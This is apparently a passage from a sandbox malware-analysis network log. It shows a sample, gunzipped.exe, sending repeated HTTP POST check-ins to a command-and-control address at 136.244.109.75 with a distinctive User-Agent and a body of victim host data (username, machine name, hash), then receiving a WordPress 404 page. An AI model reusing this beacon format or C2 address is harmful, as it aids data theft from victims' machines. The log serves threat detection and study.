{"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/! This file is auto-generated /!function(i,n
Apr 17, 2024 03:18:16.038153887 CEST	1289	IN	Data Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
Apr 17, 2024 03:18:16.038192034 CEST	1289	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
Apr 17, 2024 03:18:16.038228035 CEST	1289	IN	Data Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
Apr 17, 2024 03:18:16.038270950 CEST	1289	IN	Data Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
Apr 17, 2024 03:18:16.038310051 CEST	1289	IN	Data Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
Apr 17, 2024 03:18:16.038347960 CEST	1289	IN	Data Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
Apr 17, 2024 03:18:16.038386106 CEST	1289	IN	Data Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
Apr 17, 2024 03:18:16.038424969 CEST	1289	IN	Data Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
Apr 17, 2024 03:18:16.038465977 CEST	1289	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.5	49769	136.244.109.75	80	4080	C:\Users\user\Desktop\gunzipped.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 03:18:16.378463030 CEST	244	OUT	POST /index.php/1748937 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 136.244.109.75 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 412D3974 Content-Length: 153 Connection: close
Apr 17, 2024 03:18:16.583364010 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
Apr 17, 2024 03:18:17.517573118 CEST	1289	IN	HTTP/1.0 404 Not Found Date: Wed, 17 Apr 2024 01:18:16 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found – Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world » Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world » Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/! This file is auto-generated /!function(i,n
Apr 17, 2024 03:18:17.517642021 CEST	1289	IN	Data Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
Apr 17, 2024 03:18:17.517679930 CEST	1289	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
Apr 17, 2024 03:18:17.517716885 CEST	1289	IN	Data Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
Apr 17, 2024 03:18:17.517760038 CEST	1289	IN	Data Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
Apr 17, 2024 03:18:17.517796993 CEST	1289	IN	Data Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
Apr 17, 2024 03:18:17.517834902 CEST	1289	IN	Data Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
Apr 17, 2024 03:18:17.517875910 CEST	1289	IN	Data Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
Apr 17, 2024 03:18:17.517915010 CEST	1289	IN	Data Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
Apr 17, 2024 03:18:17.517956018 CEST	1289	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.5	49770	136.244.109.75	80	4080	C:\Users\user\Desktop\gunzipped.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 03:18:17.867641926 CEST	244	OUT	POST /index.php/1748937 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 136.244.109.75 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 412D3974 Content-Length: 153 Connection: close
Apr 17, 2024 03:18:18.075788021 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
Apr 17, 2024 03:18:19.005958080 CEST	1289	IN	HTTP/1.0 404 Not Found Date: Wed, 17 Apr 2024 01:18:17 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found – Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world » Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world » Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/! This file is auto-generated /!function(i,n
Apr 17, 2024 03:18:19.006020069 CEST	1289	IN	Data Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
Apr 17, 2024 03:18:19.006059885 CEST	1289	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
Apr 17, 2024 03:18:19.006100893 CEST	1289	IN	Data Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
